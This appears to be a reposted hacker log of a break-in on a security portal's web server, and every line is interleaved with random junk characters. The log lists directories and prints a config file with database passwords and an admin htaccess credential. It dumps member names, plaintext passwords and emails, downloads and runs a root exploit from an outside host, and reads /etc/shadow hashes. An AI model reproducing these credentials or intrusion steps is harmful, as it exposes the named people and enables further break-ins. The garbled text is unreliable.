: t' o9 x, ~ u+ I' {1 p) B. W- Ndrwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记[email protected]2 \, T- |$ J( s9 I+ s+ f
drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend, ?& }( q* S0 ?$ B
drwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner0 \! ~/ B: @, W
-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg! b/ S& n( j# B+ H& }
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config5 l9 L" n" n( o/ G# ]+ _
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron' y) M! {2 F& |, R, d1 n, r
drwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd# @# |2 y$ v% u- L9 p: e! `9 E* U% ]1 e
-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php
1 t" v! R4 K6 l$ c" z" {: j4 E-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico
! H1 A& x: k# fdrwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed
+ }: z+ }' ^ [0 e. v9 idrwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour [, s7 A, c( E+ f
-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess
t, d8 P. B' D6 i-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess" Z, U0 a, j1 u7 ~# o; `; G
-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php6 w2 c$ }2 m# K. D+ I" b5 U# l3 y+ e7 Y
-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html7 C+ A! u j+ K. x8 t
-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php% b! {+ G" X) K8 i ]
-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php
) b' G5 |0 W- Y3 L-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf
. x$ c7 y8 X! @' L1 Jdrwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc6 H( _, S- K& F" W8 n, X s) u
drwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang2 |! m& B+ l" p
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib
* O+ h! Y/ h6 j. F% vdrwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log
* t7 l' N2 M% n9 s4 jdrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member
* [, W* p3 N; t+ a6 Udrwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata
/ B Q" X4 @6 Z% }drwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new
" [0 X: m- Y }! q) T, x }-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf
; J; k" v& {. R: j% m$ Z0 xdrwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re3 l+ y# ^# E7 G+ ^. l4 ]
-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt4 h) f& ?$ _) a( T- Z& l8 C# b/ l4 s
drwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss
+ S8 Z* ^+ O' h- Zdrwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources
# p( `" C% f/ Q/ Z8 Jdrwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com+ Z ?! g+ \& K% }( X9 e: Y
drwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes
# t) l4 N3 E# Idrwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src
% R% {; `) L3 y3 w3 W0 h* ndrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl( F$ Q0 r# s4 |9 L
drwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2% p0 q( p5 Y8 V" J; O6 T1 C
drwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old) E6 j; d6 F1 n( v* t) B) a
-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php
! D+ L( Z8 V: x9 p2 d* Mdrwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki0 R2 z3 |' b8 }- r0 E1 D. o
# i- `: m4 t$ t! |sh-3.2$ head -20 index.php# `6 s4 G, S4 w6 ~: X6 A. }. r
<?PHP
w( N) v* k3 j5 o/**8 m( A! e4 H# z. j$ V3 j
* Mainfile (external) for astalavistaNET v2.0
( h( \! v. s, N* n*
- c/ W3 N1 |/ o1 Q0 O+ `) b0 t4 \; z* @copyright Astalavista IT Engineering GmbH
( c: x+ x# S6 G* @author Thomas Kaelin <链接标记[email protected]>
) [9 b8 s! n( j* @version 1.0
N" h4 a+ C6 h*/7 v" w1 k8 w$ n( p+ m
: E/ P- V4 v5 r4 [
if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {
7 A( M. |4 X n4 C% _ $dontStartSession = false;
+ X" X. B& x+ `* Q, N9 i } else {, @. ^0 u) X# T/ W. T
$dontStartSession = true;* d% s3 n$ p. V( E
}
& l" {1 ]* I( T |6 J8 | require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);! `9 C1 q1 e8 U) Y4 w' ?" A6 [! O. u
require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);
z Y# Q+ w6 N: ?5 D require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);
% P s0 S# r$ ^* u: t- V( K require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);# e( N) E, D0 H. e
) e! u: U/ z2 W. p6 h, h# `# r
sh-3.2$ cd config
0 C9 K& Y, [2 F& [. fsh-3.2$ ls -la' a. U+ Z2 x6 D
total 32! n' Q" V, y% d+ ^# Q* a( O7 l
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .$ F; n6 v0 w$ b% {4 t
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
5 Z& z* a4 v% f+ T' i-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php
+ ~$ ^* [) J7 E4 f* a% A-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php3 D5 T, ?0 c0 D/ n
-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php1 l8 ]' l8 C/ _8 E$ \
-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php
; k N8 t8 w* g" p. S' g3 }-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php. N! L% r5 V i1 |) ~3 j7 ^
" Y; D* M: ?+ f9 s$ F
sh-3.2$ cat com.conf.php B* X+ p: y0 Y h1 v1 _
[snip]$ h- Y$ z1 l6 q2 N, ~) c3 z" g
//member-database' p2 E7 O3 n8 o( ?
$_CONFIG['db_mem_server'] = ‘localhost’;9 R. ?+ \$ q U
$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;
4 F8 C7 z. I& E; {1 N$_CONFIG['db_mem_user'] = ‘astanet_db’;1 u+ e6 p" _* D: C
$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;. |( s. ?9 I2 B5 M# i* ]: d0 C
$_CONFIG['db_mem_debug'] = false; //true or false
l5 ^1 z1 k6 m4 H3 e& I//ads-database; g2 w- S k7 N* l) D$ n
$_CONFIG['db_ads_server'] = ‘localhost’;. I: r" e8 U) e9 X. f1 |- k7 {
$_CONFIG['db_ads_database'] = ‘astanet_ads’;
8 c" c( X- P; D8 O0 E' k$_CONFIG['db_ads_user'] = ‘astanet_db’;- Q5 r2 k/ A2 `9 b" {
$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;+ K& N9 B" V" Y6 t
$_CONFIG['db_ads_debug'] = false; //true or false1 ? e& [! n5 S5 X. i5 ?. ]
//rainbow-database2 C% g1 L: o3 R# W- e8 }
$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;
6 A7 |; @! H9 r9 i2 Y$_CONFIG['db_rainbow_database'] = ‘rainbow’;2 A. \9 @" M5 w2 x
$_CONFIG['db_rainbow_user'] = ‘dinu’;
9 v4 x0 E' N) p+ P% L+ n$ g$_CONFIG['db_rainbow_password'] = ‘dinudinu’;
" W) y) F) p# x6 ]+ `& {% X$_CONFIG['db_rainbow_debug'] = false; //true or false
\5 W8 ]! r3 k5 y I//mailing lists database
5 y1 a5 m2 r4 z) ]& H) m$_CONFIG['db_mailing_lists_server'] = ‘localhost’;
8 ~+ }$ l2 H1 a! ^5 _$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;* I2 a9 z0 N& B* y% h/ X7 i
$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;
: E. Y/ P7 w+ V& ]; r$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;
+ r; }6 C! `. ~8 ~. l$_CONFIG['db_mailing_lists_debug'] = false; //true or false1 t, a5 |8 `/ c: I# R& K! v
//paypal
+ v4 I7 C# {! r1 ^+ o5 S$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;4 {& X$ h, ]2 j! G& A
$_CONFIG['sub_pp_cmd'] = ‘_xclick’;7 N8 N% h$ W0 i/ `; d
$_CONFIG['sub_pp_business'] = ‘链接标记[email protected]’; ^8 C6 Z- r9 n
$_CONFIG['sub_pp_noship'] = ‘1′;) G& T! _/ A& S" O2 Q# O K
$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;, X4 w5 `' s9 X
[snip]% H: b9 G6 ^+ O( N2 P/ V
# d4 }" [5 q, N9 \" {' h
sh-3.2$ cd ..
y4 z8 m; a* ~: V+ M, gsh-3.2$ cd member
) l4 Q4 F# B3 V0 j6 x& D+ Psh-3.2$ ls -la- \% y+ {, E& `
total 20$ _2 f0 K7 I# g; `3 B- F( z
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .
8 F5 T1 Q* }: g+ I/ v" \, `drwxr-x— 29 astanet apache 4096 Jan 6 13:58 .., d) t8 Y2 {3 j: ?7 Q: m
-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess
7 {- K+ w- k. T-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php4 l8 f$ C$ l( f& H: N4 E
sh-3.2$ cat .htaccess
6 g4 r: D- j1 C ?4 ySecFilterEngine off0 L) C, T3 n1 U* l9 m5 Y/ ^) ?
; |" c. x7 N, n- bsh-3.2$ cd ..7 Z8 K. i i7 h7 C0 y1 n
sh-3.2$ cd cron& ~" L6 S( q' N
sh-3.2$ ls -la# T9 d4 a9 |* K4 n% _) X
total 168
! c$ O1 _" W% Ddrwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .
8 A z; p0 a" s( M' Vdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..3 i( U# t& z2 {; m7 J8 m3 ~$ L
-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php7 M7 S$ G* v/ G2 f; ?- U; I& q5 r
-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php
6 \) r& H3 X; f+ @: q9 a-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php
! l! D5 Y3 t/ n- h0 A- y1 Y+ M-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php
: S; \/ u# z9 n. x! f. G-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php
0 \; A5 Z! i, ~4 r/ S-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php
3 E3 x# S9 {1 H: Z. k+ q. s: V-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php7 [4 c9 G. ^6 `4 o1 o2 D
-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php7 M; a9 u8 O1 y6 y/ G# M% e$ x
-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh
" R+ `1 }4 q4 q! l4 \-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php0 D, f6 w& a# d* m2 G$ i# z5 d0 i; @& f
-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php) F8 I5 y, N4 \6 N* ]" Z/ L/ i. B
-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php1 i4 b2 Q/ k0 X \# K, ~
-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh+ U) ^; q0 y$ C; z. \% h2 p
-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php
m" D$ n, n* P" {) M7 w-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php
7 ?+ m3 n) D4 `4 M3 z-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php
! T" w1 z% P( J7 ^$ e+ d-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php
5 g; z( k; ^" f1 s+ H1 {6 v-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php
2 Z, e& o. Q' i5 t) Q8 P7 ^drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email
3 f' n, k% e" R1 g" Z3 a-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php
9 ^6 }$ {8 z/ Y# X4 V( Y-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php
$ K3 a& j" f1 m
/ M$ i; ~' u( d; J. w' Psh-3.2$ cd ..
1 P' q* k7 n# U% y5 F0 R$ x0 Osh-3.2$ cd _007
/ |7 [. Q, g2 t, d* K" N# w7 Tsh-3.2$ ls -la. F6 O' R6 p, Z
total 24" X% z6 D9 Y2 M. M
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .* d/ o/ ], w* D* P0 U
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..# Z& B+ a% [) L9 `2 j& c1 P+ e: V- I
-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess9 Y# r. V+ K$ w2 X
-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php m* o* W( K6 Z. d
-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php
) y/ F/ c$ Y/ Mdrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap
6 B# o+ F5 c. K6 B" b' i; _- j' {! z* P. A2 w) E
sh-3.2$ cat .htaccess
" ?+ J0 E9 i5 fauthType Basic
6 v# G( _6 P1 x2 e. C0 s- n. j' r3 RauthName Admin8 Q# g# p) w# h
authUserFile /home/astanet/auth/.htadm_pwd# d9 Z# ], `% K) C2 e% l6 d
require valid-user; D3 C8 [; ^5 h2 |" Y. f0 l$ {
& L1 _2 J8 p9 a. j, m5 k" L
sh-3.2$ cat /home/astanet/auth/.htadm_pwd1 A: b, v) U. Z$ O
admin2net:CR0bl65MwhfT
: g1 b1 ] J& q
! d! v. u- ^- F) V9 O! k( Ssh-3.2$ mysql -u astanet_db -p
' W# o* U; p7 Z+ v6 r5 T Z/ p7 ^% G4 oEnter password:: s0 Q9 D% E* F* k) Y/ y( {5 P# a
Welcome to the MySQL monitor. Commands end with ; or \g.
5 |! q3 D. [/ ~# [/ N T5 jYour MySQL connection id is 275153
8 |, [8 ]' b1 p9 Q% k( mServer version: 5.0.45-community-log MySQL Community Edition (GPL)
6 C- k6 u/ g" x( Y1 a4 J& O6 ^$ m, M) K- _( j! [; J
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.% ~& w7 C& _: S: N0 K* ^7 k9 B2 J9 D
* H: b- E5 Q+ p. s/ l$ r. [6 Xmysql> show databases;
# m, d& s1 |, c9 C+———————–+
9 M2 A& x0 o) }7 ? n4 X8 ?6 t; O; W| Database |9 e! `* @+ v+ K
+———————–+% y1 y# T9 p# A$ A# x+ J$ o0 w \5 @
| information_schema |' B- X! v" L5 `2 N s5 e+ }
| astanet_ads |
# f+ R- S* t' v Q# J| astanet_mailing_lists |
) X! e$ B7 ~# E2 k| astanet_mediawiki |
( W' r+ m$ f( b8 s% N| astanet_membersystem |0 r, C+ v: x7 R0 B2 ^* u
| test |
' v8 U" l) o! n+ ]0 e2 ? x+———————–+
! E4 N; m& F$ \6 rows in set (0.00 sec)& n2 Y( _5 l9 r: p' A- ~( B* Y
% D* n% [" X- a& ]5 Z& H
mysql> use astanet_membersystem6 V1 K- u, i6 Q) v# M9 o$ W
Database changed
) \; v: M1 \/ f6 n4 vmysql> show tables;
, B" m+ Z# u' @* ]) P& o0 \* I+———————————–+ h. V4 |" S( o
| Tables_in_astanet_membersystem |
' e# g( A9 z5 n- p$ g: p7 I+———————————–+
" @5 Y ?" f+ }/ T) n- j: ^5 X| blacklist_categories | z2 |) C) ^6 @
| blacklist_content |
. m# q3 x4 V: a" @, _/ W| blacklist_levels |9 s9 V& j5 {0 b. G0 b9 B ~
| blacklist_mcset |
0 o \. R5 i8 V' @6 K3 c' H| dir_categories |
2 H* b; o/ L4 v, }3 P3 z% {+ @' o| dir_comments |# y! ?( s+ F7 k! a
| dir_links |
1 X9 q" \. p$ q5 d8 Y9 z1 g& i| dir_temp |$ Z- `( g1 G* q" n+ J) |6 L
| dir_votes |. g2 |& t" T2 k% L- ?
| documents |
. r3 k* w! i0 R4 ^! ], T3 u7 J! k| documents_categories |
# H/ _% X' }) M1 S| email_content |
1 b; T! T+ Z/ D| email_settings |* y# ?: ]6 S5 g" k! S0 ~
| exploits |7 R: I+ s4 \( J9 Z5 J
| exploits_categories |
" r% B9 G! u) l+ S| exploittree_categories |9 H1 v' Z* y) T8 T( W9 w9 X$ Z
| exploittree_exploits |* G9 F& C; ]4 ~0 l1 b
| home_values |7 t" n, f+ Z# J7 F3 e! A' K+ ^5 a
| iso_countries |
+ o, o0 G* v4 ]6 c% E| links_categories |4 g. O8 M- \0 i( N2 J+ {* x
| links_records |
7 W& S G7 _$ s8 g- T| links_unauth |8 V3 ]. x; r( O( s+ e
| links_votes |
$ ]3 Z1 F3 ?: R3 l| log |
* Y' q5 D( X5 U. G0 }9 q| news_categories |2 }& |; S1 {; ?( B' g
| news_comments |
% p& Y9 p9 [- b$ l# }| news_emoticons |
- w1 v& T4 I- r! R% c2 v; `| news_latest |9 e3 v2 H) B. E3 ?& Z4 u" G
| news_messages |" E8 D( Y @0 X+ w
| news_statistics |
* f- L3 e X4 z# U| news_votes |: S* F, y! }; V0 {% x
| prices_content |
' Y3 W! ~ p" f| prices_offers |
. i9 I, j; o! g8 `' _, K| rss_settings |$ V! V8 k) T+ T: l. f# x
| sessions |
+ \# C( `. h, c" C; w: V| stats_signups |
9 I0 y" f& z x/ u7 f$ F, H! [| u2u2 |
) C( ~. P6 O% m- C7 a& n- F" y| u2u_contact |8 y, S) S6 Q: ~- ]" o0 J; M
| u2u_settings |
1 q. I0 w% H/ E/ a# I: J# D| user_keywords_selected_categories |
- z* }0 d! u1 |- X" M| users |
3 t: \' s/ C" |4 D# P$ j| users_ipn_test |
; D2 @) _4 k& o# O% I- i* {1 r- y| users_keyword_values |
5 G& g( U5 \) ]8 z| users_profile |
3 r8 V0 l4 d9 b| users_temp |( c. k: D! y* `
| users_upgrade |
- H1 M' T& r2 |& B I+———————————–+
+ W3 f. N/ o5 N/ f+ _2 W46 rows in set (0.00 sec)6 Y: N. a; a$ J9 u8 m1 Z
8 h, D, T6 X& j, c& T( Bmysql> describe users;! l* b% l( \5 J$ n" o
+————————–+————————————–+——+—–+———————+—————-+
$ K' k# \3 Z' G9 \' V& O$ ^| Field | Type | Null | Key | Default | Extra |6 y& I: X4 N) b3 y' O4 S. F
+————————–+————————————–+——+—–+———————+—————-++ v, G5 N/ a+ [+ c; }7 `7 M* b
| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |
; I( l; j! u$ W5 h- q2 M# T/ {| user | varchar(50) | NO | | | |
9 C) r6 ?6 x+ U+ L* O; g| nickname | varchar(30) | NO | MUL | anonymous | |: i" `) Y1 ^9 `6 ]6 b4 L7 m0 O
| password | varchar(30) | NO | | | |
7 t& h6 |! `' F" ~# u| userlevel | tinyint(3) | YES | MUL | NULL | |" w4 _5 X6 ^, b A
| exp | int(8) unsigned | NO | | 0 | | B1 z* K# M0 n6 s
| email | varchar(50) | NO | | | |: t" O! p* k$ |
| ip | varchar(15) | NO | | 0 | |
) X, C7 i- b1 X) b& \' u5 ^| proxy | set(’0′,’1′) | NO | | 0 | |" E2 |7 k) Y6 Q3 z8 H$ \
| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |
: V% A+ ]: k' ]1 z$ P| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |
1 U$ _ O J) A. X- V| anz_in | tinyint(1) | NO | | -1 | |
/ U, t) j% n* C! V3 Z8 k4 s) Q| status | tinyint(1) unsigned | NO | | 0 | |
9 m$ ?% ~$ x! X0 Y| checked | set(’0′,’1′,’2′) | NO | | 0 | |
4 G3 }$ n1 ^% n/ x# h| freemember | set(’0′,’1′) | NO | | 0 | |
1 d, g5 A* P6 `0 D3 b| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |
( B* K" c/ C+ f0 \6 a6 J# C' m| lang | tinytext | NO | | | |
, W8 M2 y- n8 F6 W| adid | smallint(6) | NO | | 0 | |2 A! x1 a) B: I: y1 m
| pp_txn_id | varchar(255) | YES | | NULL | |
, p/ S% Y* M2 F7 }% `% a* S1 W| cnb_transaction_id | varchar(255) | YES | | NULL | |
' J/ Z" X! M; r& M! Y| cnb_order_id | varchar(255) | YES | | NULL | |4 i5 r% N# S, y6 T& ^
| cnb_user_id | int(11) | YES | | 0 | |: U: B. N5 P0 p/ O( H% G5 K- i, j
+————————–+————————————–+——+—–+———————+—————-+3 |2 X5 r/ p. h- I7 x7 @
22 rows in set (0.01 sec)5 J6 p1 t2 Q$ |3 I9 F5 [" K
5 z: C0 i# u% Q; @
mysql> select count(*) as skids from users;! N E( e. |5 l5 ~, h
+——-+' i, d6 ~6 W/ n9 E- ~* Q/ q
| skids |
& l5 ~# g" u6 u+——-+( y; E, O9 x& w6 C$ o
| 25199 |
; F- l+ @2 J$ [+ ^+——-+
# H# e) P( r+ a+ O/ a1 row in set (0.00 sec)# h* V. d, d/ A
* w; F# e- F/ g# k) B( Wmysql> select user,nickname,password,email from users where userlevel = 1;
' |3 T' u9 t+ x0 s# Z" @+————————–+———————-+——————+———————————–+
) _; b. r: G! x! || user | nickname | password | email |; z5 m& f% A1 R7 H5 T
+————————–+———————-+——————+———————————–+) Q9 \* H5 ?; c* F" J
| pascal | prozac | astaman3 | 链接标记[email protected] |
1 z0 B9 j% m/ O: ]4 c$ f; L' e- B| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记[email protected] |, q3 X+ |* O' U; m7 s+ M3 W) R, m
| qreymer | Palermo | qblsw85iam | 链接标记[email protected] |( t$ f" k9 u' v
| Christian Wehrli | g0atherd | hitt?74 | 链接标记[email protected] |3 _, c' ~2 q; X# w+ u% i1 M8 y* j
| Andrew Blake | Minky | liq73uid | 链接标记[email protected] |0 b, q/ O3 j/ N! H% j
| Martin Wyss | dinu | kj63;cXy | 链接标记[email protected] |
- ~. U1 i2 p9 `| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记[email protected] |
' r( D$ B3 ^$ [# {| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记[email protected] |
6 A7 Q- s" H! ?8 P6 }| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记[email protected] |
; U. u) V* I: c# r| David M Lee | Daremo | icG12m03 | 链接标记[email protected] |2 I) b O, N1 Z9 j6 L0 _$ Z
| David Corn | akriel | ve3uB$cUku | 链接标记[email protected] |
" q, y. W% }4 w3 i" S8 i' y| Thomas Kalin | Gwanun | QwErTy123 | 链接标记[email protected] |( r2 Q# p9 q9 t$ R, z0 T" \) e% {0 v
| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记[email protected] |, X( W& F: p8 o/ W( y
| David Ellis | dellis203 | philip | 链接标记[email protected] |
5 W! r" D5 u& i y7 C| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记[email protected] |$ c. w/ G$ }' S( Z* E
| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记[email protected] |, o9 @2 U2 y3 D: v( t: h. |( ?6 z
| Thomas D?ppen | daha | asta4tom | 链接标记[email protected] |
: Y7 r, r' u" ], z| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记[email protected] |
$ u9 U/ k& S+ K0 ?) N) N2 p; ]( {| Fabius Bernet | traviser | wellenreiter100 | 链接标记[email protected] |$ X9 J. T: d/ J4 a) d) Z2 [
| Zachary McElroy | duder1 | dirty245dix | 链接标记[email protected] |
% U a& n* I$ q p, |4 o, l2 [| Leron Cohen | cohen2 | leron4free | 链接标记[email protected] |# G& j! B2 N0 W/ n, X
| Beatriz Pontes | anonymous1656 | pitas | 链接标记[email protected] |4 C( ]! [7 ]' X4 I0 F
| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记[email protected] |
1 t- v: [. y7 r4 n; H! }- i2 Q1 E- K| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记[email protected] |
- l( Y* N, T$ U9 Q' m| Peter Fisher | cyph3r1 | testZer025435 | 链接标记[email protected] |0 Y% Y3 \* ^# R, j% d% U
| sykadul | sykadul | ak29eral | 链接标记[email protected] |, _3 u& ~' G1 Y; P
| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记[email protected] |5 Z2 m8 x9 e3 i3 i- ^9 g0 v
+————————–+———————-+——————+———————————–+
. k/ ]/ A: \8 L' H7 f# q) ]27 rows in set (0.00 sec)
% D1 |6 N: \: j4 A9 P9 j: T* v2 J" b% _1 }* c7 \0 D' k
mysql> exit;
! T/ j, ?1 w/ {* GBye
0 j2 i% U/ _! q+ W( x! r
% d7 A1 P2 R- l* B2 Y[~] plaintext passwords? yes,
8 z: c$ q1 @" F# }Those so called “security professionals” who charge you $6.66 / month to0 O4 |! I" J1 E" X% a5 K) X, I
register at their hack-proof portal, save your passwords in plaintext…4 N. T! n3 ?8 C# [; Y" [6 Y+ q
brilliant!! d% H) q! x! a! N8 B, F. a2 o. m
9 G% s( e/ Q( s/ i7 u# `7 X# }/ a9 E# }[~] This been fun but we want more.
# p* O+ N; o; m9 t* X
& N* W, D* s3 j5 Y& p! Dsh-3.2$ uname -a
8 r- X! K: G7 V6 L& M8 dLinux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux9 y5 G% h( G. C' `8 }5 x+ Z
sh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]$ G1 t# |6 i$ T' s; X
–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]
# T& ~3 I4 s. o* y1 r( ]Resolving anti.sec.labs… 13.33.33.379 v! Z+ M7 p8 }% Z* ~
Connecting to anti.sec.labs|13.33.33.37|:80… connected.# x6 r, J, k% x; I7 J% }
HTTP request sent, awaiting response… 200 OK
& D4 N6 Q7 Z3 M+ _ X1 N1 PLength: 18200 (18K) [text/plain]* T) }0 l4 Z$ V% G1 _7 w( ~4 `
Saving to: `g0troot’9 W3 T- Z" B( b- O( [1 z1 o) S
( r8 P9 s; p) b3 V
100%[=========================================================================================================================================>] 18,200 58.6K/s in
& O: h9 _. s* o3 v! ^0.3s, h5 i2 v: W L: c) Z
! n( m& }0 q$ C, g
18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]
. f+ L. y- R3 d9 T& M9 ?0 U: X6 h3 q) S8 D+ Q
sh-3.2$ ./g0troot -i x86_64. i0 x) Z% |* s1 i# ]4 ~
[+] g0troot - anti.sec.labs
! N8 m; J* c# F[+] Target: 2.6.18-128.1.10.el5) b3 s8 T% M' X! y+ b6 t7 q
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]4 @2 F4 Q$ ?! A2 ^( s) r3 f
4 a7 q2 t. s5 E[+] r00tr00t8 o0 \- B7 ^ [2 L/ v
[~] Executing shell…
, B7 ^- R8 |' V- q9 Q' ~( g5 _! T7 [( N# [0 K) h
sh-3.2# id9 G% ~: X! d' |" r3 e$ a
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
0 {$ i! a& l) k# o" Q
8 b& N* \6 V G* ush-3.2# cat /etc/shadow
. x& y6 M+ I2 g3 z& hroot 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::
$ C( G1 Q7 L0 T# c4 r* V[snip]
Z* N8 ~8 L$ _$ Nadmin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::0 j! {7 b' {2 j/ J
jon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::4 T, S# }1 v) E! i
com1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::1 x$ B( f& h! G
astanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::
; t- ]1 D/ h u2 V6 Q
* E* p+ I2 J+ W8 F1 Csh-3.2# cat /etc/motd% q" I5 [$ _' E( p9 n
#####################################################
$ m1 c+ G% W# ~. p: ]5 a#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #
. E% \% m5 t% f$ v. B9 u5 b" g# |__| [__ | |__| | |__| | | | [__ | |__| #
q# D, [3 |% u; v* z8 n, }+ d# | | ___] | | | |___ | | \/ | ___] | | | #, S7 k# P T: L5 B, T
